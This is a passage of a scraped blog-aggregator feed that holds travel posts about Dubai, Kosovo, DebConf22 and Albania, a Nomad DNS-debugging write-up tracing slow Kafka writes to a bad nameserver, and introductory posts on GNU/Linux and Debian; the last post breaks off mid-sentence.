Al-Qiyada metro station should be open. We walked 2 kilometers to reach that metro station. However, the restaurant wasn’t open, and so we had to return with disappointment. Abraham and I made some interesting conversations on the way to pass the time. I was starving at this point.\nWhile returning to the Arrivals, we saw a restaurant open on the way. The name of the restaurant was ‘Food Castle Express’. It was located within 1 km of the Arrivals.\n\n      \nA photo of the Food Castle Express restaurant where we had a filling meal.\nThe restaurant had Indian food with reasonable prices. It was being run by people from Kerala and seemed to be a popular place among the airport staff. To give you an idea of prices, a plate of 3 Idlis was 5.5 AED (equivalent to 110 Indian Rupees), a cup of tea was 1 AED (20 Indian Rupees), a plate of Pav Bhaji was 8 AED (around 160 Indian Rupees), while Chicken Samosa, Aloo Samosa and Cheese Samosa, were 1.5 AED per piece, and Chicken Fried Rice was 12 AED.\nI took the following:\nItem\nPrice (AED)\nPrice (INR)\n\n\n\n\nIdli (3 pcs)\n5.5\n110\n\n\n1 Tea\n1\n20\n\n\nChhole Bhature\n7.5\n150\n\n\nTotal\n14\n280\n\n\n\nWe had this meal around 04:30 hours, and it kept me satiated literally for the whole day. Even though I was not in India, I was delighted to have Indian food. It is because we were having it after a long time because we were coming from Europe after a 3-week long stay, where every dish was bland.\n\n      \nA chhole bhature plate from the Food Castle Express restaurant\nAfter having our meal, we went back to the Arrivals section to catch some sleep. Abraham took a nap on the benches, while I failed to get any. In the meanwhile, I found out that the water inside the washroom was too hot to even wash my face.\nDubai Airport had a very good Wi-Fi which was a lifesaver. I didn’t have a local SIM card, so this helped me a lot in contacting home and passing time. The Wi-Fi has free unlimited access. You just need to simply select the “DXB Free Wifi” option, and it connects without asking for a phone number or OTP.\nAbraham had slept for a couple of hours on the benches and woke up by 09:00. At this time, we exited the airport and were looking for a bus to drop us at some metro station. We found out that we need a card to use the public transport (such as buses, trams, metro) in Dubai. This card is called the Nol card. In order to obtain one, we had to go to a metro station. There must be other ways to obtain that card, but we didn’t know any.\nThe nearest metro station was Abu Hail Metro station - 2 km walk from the airport - which we had to cover by walking. It was not exactly fun as Dubai has a hot desert climate and the temperature was around 40°C, with sand coming into our eyes. To add to his, we had a lot of luggage. The bus stops were air-conditioned and sheltered, so we took shelter in one of the them while walking towards the metro station.\n\n      \nA bus stop in Dubai.\nAt the Abu Hail metro station, we took the silver Nol card (one for each), which was 25 AED (500 INR) with 19 AED balance. We planned to go to Burj Khalifa from here.\nThe metro from Abu Hail to Burj Khalifa was 5 AED. It was much cheaper than taking a taxi which would have added 25 AED as the basic fare. We reached the Burj Khalifa metro station in 25 minutes, following by walking to reach there. While clicking pictures, we realized that fitting the whole Burj Khalifa in a single frame is difficult. After all, it is the tallest building in the world!\n\n      \nMe and Abraham with Burj Khalifa in the background\nAfter roaming around a bit, we went to the Dubai Mall, which was walking distance from the Burj Khalifa. The strategy was to spend as much time as possible inside such buildings to avoid the onslaught by the harsh weather. Abraham had a meal in the mall, while I didn’t eat anything due to lack of vegetarian options.\n\n      \nDubai Mall\nWe still had 14 AED left in our Nol card at this point. Further, there is no facility to return the card and get the balance refunded. Therefore,we wanted to spend that amount before leaving the city. So, we planned a tram ride which will spend almost all the card balance, cover the city and does not require walking outside of air-conditioning. To take the tram, we went to Sobha Realty Metro Station and walked towards the tram station.\nThe tram ride was nice. If you ride the Dubai tram, be careful to check in and check-out using the Nol card at the tram station, otherwise you could be fined. We saw the Dubai’s Marina area from the tram. The tram takes 3 AED regardless of the station you check out from. We deboarded at the same station where we took the tram.\nFrom there, we took a metro from DMCC station and returned to Abu Hail metro station. We went to Food Castle Express. I didn’t find a good vegetarian option there, so I skipped eating there and just took a chai.\n\n      \nView from inside the tram\nAfter this, we returned to the airport to catch our respective flights. We didn’t face any language problems in Dubai. English was widely spoken. Most of my conversations were in Hindi, as I met many Indians and Pakistanis who knew Hindi. In fact, Abraham was talking to people in Malayalam (which is more popular in Dubai than Hindi). Overall, people were very nice which made us feel like home.\nWe had a nice time in Dubai, even though it was tiring due to lack of sleep and harsh weather.",[],{"slug":1538,"title":1539,"link":1540,"pubDate":1541,"contentSnippet":1542,"tags":1543,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"my-experience-attending-debconf22","My Experience of attending DebConf22 in Kosovo","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fmy-experience-attending-debconf22\u002F","Mon, 25 Jul 2022 22:22:10 +0200","I just came out of what has been one of the most wonderful experiences of my life– DebConf in Kosovo. DebConf is the annual conference of Debian contributors from all around the world. This was my first time attending a DebConf ever, which presented a great opportunity for me to explore different cultures and food, along with making many new friends in the Debian community as it featured 210 attendees from 38 countries.\n\n      \nDebConf22 logo\nI registered and applied for bursary which was accepted by the DebConf bursary team. I applied for the Kosovo visa and after a long frustrating process of getting the visa, reached the venue of DebConf on 10th July 2022, which I have already written in detail. Getting Kosovo visa was already a great feat before DebConf and I am highly grateful to the organizers for putting their sincere efforts. Without this, it would not have been possible for us Indians to attend the event.\nThe Venue\nThe DebConf venue was Innovation and Training Park in Prizren, Kosovo. As soon as we reached the ITP campus, our eyes were treated with beautiful views of mountains and blue sky in all directions. The natural beauty of the place was stunning. You take a random photo of this place and it will come off as beautiful. This is how good it was. The fact that the campus was a German military base till December 2019 spiced up many people’s interests in the history of the place and there were some discussions regarding this.\nThe city of Prizren has a bridge over the Lumbardhi river which also features in the DebConf 22 logo. The bridge is a must visit place in Prizren, in my opinion. There was also a castle, which had views of the beautiful city of Prizren, but I missed visiting it.\nThe DebCamp held from 10 July to 16 July 2022 and the DebConf happened from 17th-24th July 2022. Most of the people came at the time of DebConf and the DebCamp days did not had so many attendees. By the time DebConf started, I already got adjusted to the campus.\nFood\nBeing a non-meat eater, the first thing I was worried about before arriving at the venue was food as I read on the internet that Kosovo’s food is heavily based on meat. In my first lunch, I had only Veg Pasta multiple plates as most of the items in this lunch was meat-based. In the next two-three days, the availability of vegetarian food got better and I started enjoying the food. They started serving bean soup, vegetable soup, lentils and rice in the lunch time, expanding their vegetarian dishes. I enjoyed the food and it was way better than what I expected. The coconut and chocolate pastry served in the dinner time were delicious, and there was another delicious desert called Al-Baklava. Watermelon, Apples and Musk Melon, peach were frequently served fruits. The food got repetitive though after a point and it wasn’t as enjoyable, but I think it was still good as I am not sure if there is a lot of variety to expect from Kosovo in the vegetarian section.\nThe availability of drinking water was through the plastic bottles in the restaurant. In my opinion, this wastes a lot of plastic and is not an environment friendly option. Probably the locals were saying that the tap water is drinkable but it would still made sense to have a water filter in the dorms or water coolers etc.\nDebConf\nWhen the DebConf started on 17th July, new attendees started arriving in bigger numbers. Here I made many friends in the hacklab or when sitting over the lunch. As far as I remember, the most discussed topic was politics. They were very enthusiastic about telling their country’s history and the politics and asking me about the Indian culture, food etc.\nThe people were very very nice and I had a great time with the Debian community. The people were from very diverse backgrounds with each one having their unique stories on their involvement with Debian. On the other hand, there were people new to Debian and they asked my viewpoints on it, which gave me opportunities to propagate the Free Software Philosophy.\nThe participants ranged from being Google or Canonical employees to college students and high school students. I met a lot of students from Pristina, the capital of Kosovo, for whom the DebConf must have been a good opportunity. Since Debian is for everyone, there were many people from the non-technical side of Debian. I liked the fact that the attendees included people who didn’t know English, which gave more diversity.\nI attended the talks whenever the topics seemed interesting to me. Since there were three tracks of talks happening simultaneously, I missed some of them. The dining, hacklab and the the accommodation were a bit far from each other. Further, it was mountaineous area and was not a easy breeze for me to get around in the campus so quickly.\nThere was a noisy hacklab and a silent hacklab. I used to hangout at the noisy hacklab as that gave me chance to meet new people. The noisy hacklab had free of charge coffee, while beer and water were given on the paid basis. Attendees could volunteer to be a bartender brewing and serving beer and coffee in the hacklab. The card games I played in the hacklab were very fun. Karl from the video team told me a long story on how much travelling video team has to do with the equipment and how hectic it is. I was totally ignorant about this aspect of DebConf before Karl told me this.\nI didn’t spend a lot of time in my accommodation. I used to go there mainly for sleep and shower. The walls were thin, so there was an actual email sent in some debconf mailing list about not to talk loudly in the dorms. The rooms were spacious and had good air-conditioning. By the time DebConf started, dorms had a very good Wi-Fi connection.\nI volunteered for some tasks for the video team. I was a talk meister in one talk– person who introduces the speaker and gives mic to people in audience who want to ask questions from the speaker, a camera operator in two of the talks.\nCheese and Wine Party\nCheese and Wine Party is a tradition of DebConf in which people bring food from their local areas to share with others. I brought Dal Samosa, which is a snack from my local place in India. This was, in general, liked by people in the party. I tried French alcoholic drink Pastis, which tasted like Fennel, and found it good. Cheese and Wine Party happened after the dinner, so I didn’t eat a lot. I had great conversations in the party with many people and it was fun.\nDal Samosa at a shop in India.\nCredits: Ravi Dwivedi, CC BY-SA 4.0\n\n\nDayTrip\nThe DayTrip was conducted by the DebConf to take time out of their schedule to visit some places in Kosovo. You can see all the options of DayTrips here.\nI went to tour A: Bus tour of Eastern Kosovo. It covered Gadime Cave, Ulpiana Ancient City, Gracanica Monastery, Bear Sanctuary, Artana (Novoberda) Fortress. My feeling was that the day trip was trying to cover a lot of places, so it became more rushed. The places were beautiful and worth visiting in Kosovo. The tour featured an unexpected hiking in the Bear Sanctuary. The weather was sunny and very hot, so overall it was a tiring trip with beautiful places and good pictures.\nThe tour guide was excellent. He was informative and also took care of the people falling behind in the trip. We were joined by other guides, one at Marble Cave and the other at Gracanica Monestary. The guide at Marble cave was telling us about it in the Albanian langauge, which our tour guide was translating into English. The guides were very enthusiastic about the places they were telling us about. It was like an overdose of knowledge that day. We got a little late in our schedule and so we couldn’t really explore the Gracanica Monestary, we had to rush back to our destination after a few minutes.\nSome photos from DayTrip taken by me:\nGracanica Lake\n\n\n\nGracanica Monestary\n\n\n\nBeautiful views seen from the Bear Sanctuary\n\nConference Dinner\nThe Conference Dinner was held outside of the DebConf venue in Alegria Hotel. Here the food was a disappointment for non-meat eaters\u002Fvegan as the restaurant only gave rice and some snacks. At the conference dinner, I liked the Flija. I still had some good company at the conference dinner so it was still fun.\nKeysigning\nIn Debian, people sign each other’s keys in order to make a web of trust. It usually involves an ID check. People will usually ask you for your pasport to verify that it is really you. I saw many countries’ passport when keysigning, which was fun. After the ID check and verifying your key fingerprint, they sign your keys. Tobi helped me in configuring caff so that I can easily sign keys, rather than doing it manually.\nGoodbye Kosovo\nAll in all, it was a great trip to Kosovo and a very unique one. I am already out of Kosovo as of writing this. I would like to visit Kosovo again in my life. It was so good. Thanks a lot to all the organizers, sponsors and people who made my time fun at the DebConf 22 in Kosovo.\nAttending a DebConf is a learning opportunity on many fronts, be it the diversity among the people, cultures, food, opinion, or the software side of Debian. Writing about my experience has been a challenge in itself. Hopefully, I was able to pin down my experience as there was lot to share.\nLooking forward to see you all in the next edition of DebConf which will take place in my country India.\nUpdate on 06-August-2022: I got the reimbursement of all my travel expenses related to DebConf22 in just 4 days of filling the reimbursement form. So quick!",[],{"slug":1545,"title":1546,"link":1547,"pubDate":1548,"contentSnippet":1549,"tags":1550,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"trip-to-prizren-bridge","Trip to Prizren Bridge","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ftrip-to-prizren-bridge\u002F","Sat, 16 Jul 2022 00:00:00 +0000","Yesterday I went to Prizren stone bridge, which is in Prizren, Kosovo. Prizren is often referred to as the cultural capital of Kosovo.\nI am staying at the venue of DebConf 22 from where it is walkable distance, around 1.5 km.\nPrizren Stone bridge.\n\nI was going with my friends who were also attending the DebConf 22. We reached the bridge at around 20:30 hours time (Kosovo follows Central European Time). It is in the city center and the views were very beautiful. Lumbardhi river flows below the bridge with beautiful mountains surrounding on all sides.\n\n      \nSinan Pasha Mosque\nThe bridge also gives a nice view of Sinan Pasha Mosque , which is a very important monument of the Prizren city, built in the Ottoman architecture style.\nNear the bridge, a person was roasting corn which costed €1 per piece. The corn was soft, but did not have many kernels.\nA street-side vendor roasting corn near the Prizren bridge.\n\nFound this beautiful take home souvenier in the shape of Prizren stone bridge.\nSouvenier from Prizren Bridge.",[],{"slug":1552,"title":1553,"link":1554,"pubDate":1555,"contentSnippet":1556,"tags":1557,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"dns-nomad","Debugging DNS Issues in Nomad","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fdns-nomad\u002F","2022-07-13T18:30:00.000Z","At work, my colleagues and I stumbled upon a hair-pulling networking issue involving a specific problem when connecting to a Kafka cluster. We use the franz-go library in our Golang applications to interact with an external Kafka cluster. These Go apps are hosted inside a Nomad cluster and running with the exec driver.\nThe Issue#\nSolving issues where a specific condition happens only sometimes is terribly difficult to debug because you need to reproduce the bug in a controlled environment. Our issue was that writing the first message to a Kafka topic took unusually high time (>5 seconds) while the writes of subsequent messages were instant. The following messages were instant for the next 30s, and then the write again took >5s.\nThe request flow looks something like this:\nGo app in Nomad cluster (bridge mode) -> Kafka node in a Kafka cluster\nBoth apps are inside the same VPC running on AWS EC2 instances. The Nomad task is running with network.mode=bridge, which means that there are some iptables rules configured to do SNAT\u002FDNAT translation to forward packets from the default bridge network (nomad) to the default ethernet interface (ens5).\nWe have a couple of other Nomad clusters in our environment and regularly use external EC2 instances to communicate, and we’ve never observed any slowdowns in our existing applications. This behaviour seemed something specific to Kafka. However, we discovered that we could not reproduce the high wait time issue in Kafka when the message was sent from a task running as host mode. So now, we had two conflicting things which made this issue strange:\nIssue happens in bridge mode, not in host mode.\nIssue happens only with Kafka nodes, not with any external services - even in bridge mode.\nWe spent a lot of time dissecting our apps, turning on TRACE level logging for Kafka clusters and enabling debug mode in franz-go. One of the significant challenges for us was that even an idle Kafka cluster could be super chatty, producing ~1Mn records for a few minutes when run with TRACE. Cutting through the noise and finding the exact point where the slowdown happened turned out to be more difficult than expected.\nHowever, with the debug logs in franz-go, we’d arrived at a breakthrough which helped us narrow down the issue. We saw the write_wait time to be ~5s in the logs emitted by franz-go. The subsequent messages had write_wait as low as a few microseconds. What was puzzling was why Kafka took so much time to wait before writing the bytes to the underlying socket.\nWe forked the franz-go library and added a bunch of our custom logs to figure out where and why exactly the slowdown happens. One issue in the logs emitted by franz-go was that no timestamps were attached to the logger. We added that and deployed the binaries with the patched version. This time we immediately found the logs, which pointed that it took ~5s from the time it initiated the connection to the Kafka broker node and the time it was able to connect to the node.\nThe Fix#\nThe node’s address was an internal hostname kafka-abc.private-zone.internal. We postulated that it could be a DNS resolver issue. We did a dig kafka-abc.private-zone.internal and instantly got the record. Maybe it’s cached? We decided to verify the \u002Fetc\u002Fresolv.conf till we waited for the TTL of the record to expire. Opening this seemingly innocent \u002Fetc\u002Fresolv.conf revealed what the issue was DNS indeed.\nnameserver bad\nnameserver good\nWe had an unreachable nameserver address in the nameserver list. The first message has ~5s write timeout because \u002Fetc\u002Fresolv.conf has a 5s default timeout in case the nameserver is unreachable. Go’s DNS resolver picked up the second resolver, which cached the DNS records until the record’s TTL (30 seconds). Subsequent Kafka write messages on the topic worked without any issues in the TTL window. When the DNS record expires, rinse, and repeat. We later found the source of the bad nameserver came from our Nomad client initialising script.\nTakeaways#\nWe use a custom Nomad client initialising script in our Nomad clusters to populate the chroot_env. Since, by default, the chroot provided by Nomad copies the\u002Fusr\u002F directory, we found that it increased the initial startup time of the alloc. It made sense to customise the chroot_env with the list of binaries and config files we would need.\nOne of the configs happens to be \u002Fetc\u002Fresolv.conf, which DNS resolvers use to resolve queries. On the host, we have systemd-resolve running and \u002Fetc\u002Fresolv.conf is configured with the stub resolver address. However, since that address (127.0.0.53) is unreachable by the bridge network in Nomad, we mount our custom config, which looks like:\nnameserver 10.100.0.2\noptions edns0 trust-ad\nsearch ap-south-1.compute.internal\nThe nameserver represents the AWS R53 resolver running in all VPCs if configured with enableDnsSupport in VPC settings.\nThe above config ensures that all DNS queries for the tasks inside the bridge network go directly to the AWS R53 resolver. The resolver can do DNS Lookups for the private zones associated with the R53 in that VPC and forward all other hostnames to their own upstream DNS resolver.\nFun Fact#\nIf you don’t mount a custom \u002Fetc\u002Fresolv.conf, then DNS resolution is broken by default in any Nomad exec task. You can quickly reproduce it with this task definition:\njob \"sleep\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n  group \"sleep\" {\n    count = 1\n    task \"sleep\" {\n      driver = \"exec\"\n      config {\n        command = \"bash\"\n        args    = [\"-c\", \"sleep infinity\"]\n      }\n    }\n  }\n}\nRun a Nomad agent in -dev mode:\nnomad agent -dev\nnomad run sleep.nomad\nWhen you exec inside the alloc:\n$ nomad alloc exec -i -t -task sleep 8b4a0a82 \u002Fbin\u002Fsh\n$ cat \u002Fetc\u002Fresolv.conf\nnameserver 127.0.0.1\n$ dig mrkaran.dev\n;; communications error to 127.0.0.1#53: connection refused\nI believe Nomad should bootstrap some DNS resolver or a relevant iptables rule for the exec tasks so that DNS can be resolved by default without the need to mount a custom config. For comparison, a docker also bootstraps the container with a customisable \u002Fetc\u002Fresolv.conf, and the settings can be specified either at runtime and fallback to the global settings in \u002Fetc\u002Fdocker\u002Fdaemon.json.\nI hope this post helps someone solve these weird DNS issues when running tasks with the bridge network and exec task driver in the Nomad cluster.\nLike they say:\n\nFin!",[],{"slug":1559,"title":1560,"link":1561,"pubDate":1562,"contentSnippet":1563,"tags":1564,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"pre-debconf-22","Complicated Kosovo Visa","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fpre-debconf-22\u002F","Wed, 13 Jul 2022 18:04:50 +0200","DebConf is the annual conference of the Debian community. This year’s DebConf was held in Kosovo, a European country from the Balkans.\n\n      \nDebConf22 logo\nDebian sponsored me for the conference. Indian attendees needed a visa to enter Kosovo, which got complicated due to Kosovo not having any embassies in India (India doesn’t recognize Kosovo as an independent country). The organizing team came up with a solution - to send the required documents by email to Kosovo embassy in Tirana, Albania (neighboring country of Kosovo) and collecting the visas later by visiting the embassy in person. This was possible because Albania was granting visa-free entry for Indians during that time period. However, this was not the standard way to get a Kosovo visa and it was an exception made by the Ministry of Foreign Affairs of Kosovo for us.\nThe conference was to begin on the 10th of July. So, I booked my flight tickets from Delhi to Tirana for the 6th and bus tickets from Tirana to Prizren for the 10th of July. Further, I transferred the visa fee worth 40 Euros into the embassy’s bank account using wise.com. On the 9th of June, I emailed my documents to the Kosovo embassy in Tirana for my visa application. Here is the list of documents I sent:\nFilled and signed Visa Application form\nScanned copy of my passport\n1 photo of myself\nInvite letter and proof of travel, food and accommodation bursary.\nConfirmed return flight ticket from Delhi to Tirana\nBus tickets from Tirana to Prizren\nBank statement (last 3 months)\nHealth insurance valid throughout the territory of the Republic of Kosovo\nReceipt of payment of 40 Euros for visa fee\nI did not receive any acknowledgement of the receipt of my email from the embassy. On the 22nd of June (13 days after submitting the application), I wrote a follow-up email to the embassy asking for my visa application status. The embassy responded by saying:\nYour name is not in the list of approved names to apply remotely. Therefore your case cannot be processed.\nA couple of other Indian attendees reported getting the same response from the embassy. However, Utkarsh from the bursary team confirmed that our names were in the list. On the 27th of June, with 9 days to go before our flight to Albania, Praveen (a Debian Developer) sent an email to the Debian Project Leader Jonathan Carter, CCing all the prominent DebConf team members and Indian attendees, sharing our frustation with the process. He proposed Debian to reimburse tickets if we don’t get a response from the embassy.\nOn the other hand, Arianit Dobroshi from the organizing team was fairly confident about the approval and suggested us not to panic. In the same email, Praveen also proposed Debian to include visa fee in the bursary by default for the sponsored attendees, for which Jonathan shared his views in a public mailing list here.\nAs the travel date approached, I was panicking. I asked my travel agent to check on the cancellation fee for my flight. They told me it was around 15,000 INR. However, repeated assurances from Arianit made me stick to my plans. On July 3rd, he sent us a letter from Kosovo’s Ministry of Foreign Affairs stating that our visas were being processed in Tirana.\nI wasn’t confident that the document was sufficient for boarding the flight. If I went to the airline staff at Delhi Airport and told them I was attending a conference in Kosovo, they would want to see whether I had a valid visa. Otherwise, they would refuse me boarding.\nTherefore, I told the airline I was going to Albania. To my surprise, the airline did not ask me for a Kosovo visa upon seeing my conference invitation letter. Maybe they didn’t know about Kosovo, as India doesn’t recognize it?\nAfter grilling me for some time, the airline gave me my boarding pass. The next stop was immigration. However, the immigration officer only asked me where I was going, to which I replied, “Albania,” and they asked me to show a visa. I told them that Albania was visa-free. So, they only checked whether Indians required a visa to visit Albania. I was elated after clearing immigration. This was followed by boarding the flight.\nI had a connecting flight from Dubai. Here, I met other DebConf attendees coming from Kochi and Mumbai. Before boarding the flight, we were asked once again about our purpose for visiting Albania, to which we showed our invitation letters. Again, they didn’t notice that the conference was in Kosovo.\nOn the 7th of July, while we were in Tirana, we received the following email from one of the conference organizers, Arianit:\nFor Tirana applicants,\nWe got notification that visas have arrived in Tirana. Please show up at\nthe Consulate tomorrow at 08:00 to get them stamped. They work until 13:30\ntomorrow. We are trying to find a solution for people arriving in Tirana at\n14:00 apparently.\nRegards,\nArianit\nNext day, on the 8th of July, we went to the Kosovo embassy early in the morning and got our visas. On the 10th, we had a scenic morning bus trip from Tirana to Prizren.\nThe Innovation & Training Park (ITP) in Prizren, Kosovo was the venue of DebConf 22.\n\nI am at ITP Prizren—the venue of DebConf22—writing this post. It feels like a miracle to be here in Prizren attending DebConf. Looking forward to working on some projects and meeting nice people.\nLastly, I would like to thank the organizing team and the country of Kosovo.",[],{"slug":1566,"title":1567,"link":1568,"pubDate":1569,"contentSnippet":1570,"tags":1571,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"first-impressions-of-albania","First Impressions of Albania","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffirst-impressions-of-albania\u002F","Wed, 06 Jul 2022 00:00:00 +0000","I landed in Tirana, Albania today, which is a country in the balkans region of the Europe.\nMy first impressions are:\nTirana is neat and clean city with beautiful landscapes surrounding it.\nBeautiful views at the Tirana airport just after landing.\n\n\n\nTirana International Airport.\n\n\n\nTaxis outside Tirana International Airport.\n\n\n\nBeautiful views on the way from Tirana airport to city center.\n\n\n\nLocals are very patient and hospitable.\nStreets are not very crowded and footpaths are wide.\nWide footpaths in Tirana.\n\n\n\nTree-lined sidewalks in Tirana.\n\n\n\nA bus stop in Tirana.\n\n\nThe city has bars and cafes all around the place.\nA bus stop in Tirana.\n\n\n\nIt is a well planned city.\nIt is cheaper than most of the places in Europe.\nMy first impression is that this is a very beautiful and hospitable place. Although, people who don’t eat meat can have some difficulties in finding good vegetarian food.\nI hope to have fun in this Albania trip.",[],{"slug":1573,"title":1574,"link":1575,"pubDate":1576,"contentSnippet":1577,"tags":1578,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"is-gnu-linux-hard-for-beginners","Is GNU\u002FLinux hard to use for beginners?","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fis-gnu-linux-hard-for-beginners\u002F","Tue, 28 Jun 2022 17:47:49 +0530","GNU\u002FLinux operating systems (if you heard about Linux operating systems, I am talking about the same. Read Why GNU\u002FLinux if you are curious about the details.) have a reputation of being hard to use for non-techies. Some of the popular examples of GNU\u002FLinux distributions are: Ubuntu, Debian, Fedora etc. I repeatedly hear that they are hard to install or knowledge of command line is necessary to use them and therefore only advanced users use GNU\u002FLinux. This is not true. Depending on your requirements, you can choose a distro which does not require a lot of technical skills to use.\nFirst of all, I would like to point out why I advertise GNU\u002FLinux operating systems. I promote the idea of Free Software and when I suggest people to use freedom-respecting software, the obvious choice for a desktop operating system is a GNU\u002FLinux operating system. There are many non-GNU Linux based operating systems as well and I am fine with people using them, but since I never used them, I suggest what I have used.\nWhat I think is that GNU\u002FLinux is for everybody. There is so much choice here that it is practically never ending. Whether you want to use as a normal user who just want a stable operating system or you are someone who likes to hack around and break things while learning something new, GNU\u002FLinux is for you. Proprietary operating systems are full of malware, so it is good time to switch to a GNU\u002FLinux distro, which are usually built by a community, everything is public and open for all to see, respect users’ freedom and privacy, plus they are usually far more secure than proprietary software, by design.\nWhether it is school labs, a company’s production machine, personal computers, servers, Raspberry Pi, human right defenders, journalists, GNU\u002FLinux is for everybody. The choice of the GNU\u002FLinux distro depends on your use case and threat model. It is not like Windows that everyone is using the same thing with same appearance. Different people choose different distributions with very different appearances and customization, depending on their taste.\nHow to choose a GNU\u002FLinux distribution for yourself\nThere is a huge number of GNU\u002FLinux distros to choose from that it can be overwhelming to research all the choices. Librehunt website can ease your search by asking a few questions on what type of distro you want and then suggests you with a few distros matching your criteria. Popular GNU\u002FLinux distributions like Ubuntu, Debian, Fedora, has a lot of user support by the community. If you use Ubuntu, for example, and you are stuck with some technical problem, chances are it is already answered on their Askubuntu forum. If not, then you can ask your question there. Many Free Software communities provide technical support. GNU\u002FLinux distros usually have large communities behind them and work on the operating system of their choice in collaboration. Here are a few suggestions of mine for a user-friendly distro to start with: Debian, Ubuntu, Zorin OS, GNU\u002FLinux Mint, Fedora. I haven’t tried all of them but I have heard good feedback about Zorin OS, Linux Mint and Fedora.\nAfter you have selected a distro, the next step is to choose a Desktop Environment. These differ in their appearances and philosophy. For example, if you are planning to run GNU\u002FLinux on old hardware, then XFCE is a suitable Desktop Environment, which is lightweight and does not consume a lot of resources. GNOME and KDE Plasma are very popular Desktop Environments with large communities behind them.\n\nDebian 11 with GNOME desktop. Source: Wikimedia Commons.\n\n\n\nKDE Plasma desktop. Source: Wikimedia Commons.\n\nInstallation\nThe installation of a distro depends on your hardware and the distro you choose. The distro you are installing might have installation guide on its website. For many distros, the installation is kind of the same. Arch Linux is for a bit advanced users where the installation differs from, say Ubuntu.\nYou will find tons of blogs and video tutorials to install distro of your choice.\nMany laptops ship with GNU\u002FLinux preinstalled. Some examples are: Indian vendor Mostly Harmless, Purism devices,  Ministry of Freedom project in the UK, Lenovo selling laptops with Ubuntu pre-installed and Fedora pre-installed, Clevo selling laptops with Debian pre-installed, Manjaro has also partnered with some hardware manufacturers to ship with Manjaro out of the box, System 76 laptops, etc.\nI suggest you to do some research and choose a computer with GNU\u002FLinux preinstalled for the next time.\nLearning about the GNU\u002FLinux operating system\nMany blogs and Youtube channels exist where you can learn about the distros. If you are curious to learn the command line, you will find tons of resources on the internet for learning. There are many books written on the command line which you can choose for your learning. Whatever distro you are using, Arch Wiki can be a handy guide.\nI started with Debian as a beginner and I learnt some command line just for fun and curiosity, but it is not mandatory for a Debian user. I found the operating system easy and intuitive to use. I have used Manjaro for a couple of months and PureOS for around half a year. Whenever I am stuck, I usually get help from the internet.\nConclusion\nAll in all, GNU\u002FLinux distros are highly customizable and give users choice and freedom to use what they want. There are user-friendly distros like Ubuntu and Debian with good user support and large communities behind them so that you can always ask for help. I hope this will post will strike down any fear or doubts you might have in starting using GNU\u002FLinux.",[],{"slug":1580,"title":1581,"link":1582,"pubDate":1583,"contentSnippet":1584,"tags":1585,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"what-is-debian","What is Debian","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fwhat-is-debian\u002F","Sun, 26 Jun 2022 13:55:52 +0530","Debian as an operating system\nDebian desktop.\n\nCredits: Juliette Taka. License: CC-BY-SA-4.0. Source: Debian wiki.\n\nDebian GNU\u002FLinux is a Free Software (software which respects user’s freedom to run, study, modify, share and share the modified versions) operating system. Debian is committed to Free Software philosophy, as software freedom is deeply embedded in its social contract. Debian’s official image ships with only free software including firmware, and the official repositories also contain only Free Software. If users need nonfree drivers, then separate images with nonfree firmware are also available on the Debian website.\nDebian's tagline is 'The Universal operating system.'\n\nCredits: Juliette Taka. License: CC-BY-SA-4.0. Source: Debian wiki.\n\nDebian operating system has three branches: stable, testing and unstable. Debian explains that the main goal of the project is to develop the stable branch. Other branches are only a means for that end. Of course, many users might still find it suitable to install testing or unstable, keeping in mind that these might break.\nDebian is known for its stability and its universality. The stability of Debian stable branch comes from the fact that it is extensively tested before the release as the testing branch. The three branch system allows the user to choose the desired stability. The stable branch gets only security updates and mission critical bug fixes. So, the packages in stable branch might not be the latest version, but they are tested thoroughly before putting there. Debian Stable users can download recent releases of some software from the Debian backports repository. Stable branch is a recommended one for a company’s production machine or school labs and personal computers too.\nDebian can run on all types of hardware and supports 9 CPU architectures and some others unofficially as well. It can run on your personal computer, a school computer, old hardware, servers, Raspberry Pi and similar devices, IoT devices, etc. Whatever piece of hardware you have, you can put Debian on it, and that is why Debian’s tagline is ‘The Universal Operating System’. This is far more than is available for any other GNU\u002FLinux distribution.\nMany popular GNU\u002Flinux distributions are based on Debian. Examples are: Ubuntu, PureOS, Tails OS etc.\nPeople behind Debian\nDebian’s biggest feature is the community behind it and how that community makes decisions. The guiding principles of Debian community are the Debian Social Contract and the Debian Free Software guidelines.\nDebConf19 group photo.\n\nSource:  Debian Pics.\n\nLicense:MIT License (Expat). Debian license page.\n\n\nIn short, the Debian Social contract promises the following to its users: 1) 100% Free Software; 2) Debian project will give back to Free Software community; 3) Problems won’t be hidden; 4) Users are priority; 5) providing support for nonfree packages to users, if required.\nThe track record of 29 years of the project says that these promises have never been broken. It is an independent project made by volunteers all around the globe. It has a democratic decision-making structure as directed by its constitution.\nCompanies or individuals sponsoring Debian project do not get any say in the decisions of the Debian project just because they gave money to the project.\nDebian project’s democratic decision making along with software freedom of the operating system makes it one of the most secure operating systems, since Debian does not have a single point of failure.\nThis works as follows:\nEvery Debian Developer’s gpg keys are signed by at least two other existing Debian developers. It is a decentralized trust model and forms a web of trust. Every package uploaded to Debian is compiled from its source code and signed by the private gpg keys of a Debian Developer. Only the owner of the keys can have their private keys. A maintainer of a Debian package abusing their position to upload malicious code intentionally will harm their own reputation in the society as every upload is public and it will stay there for lifetime. Compare this to a centralized corporation where they can upload malicious code in the packages but this commit is not public.\nHow can we make sure that the binaries match the source code? Debian is also working on reproducible builds, so that users can build the package on their own and verify that the binary actually matches the source code. Purism explained the concept very well in their blog post.\nDebian has a separate LTS team which provides support to Debian stable releases for at least 5 years. This can be helpful for companies and organizations who want support in their Debian usage.\nIn conclusion, 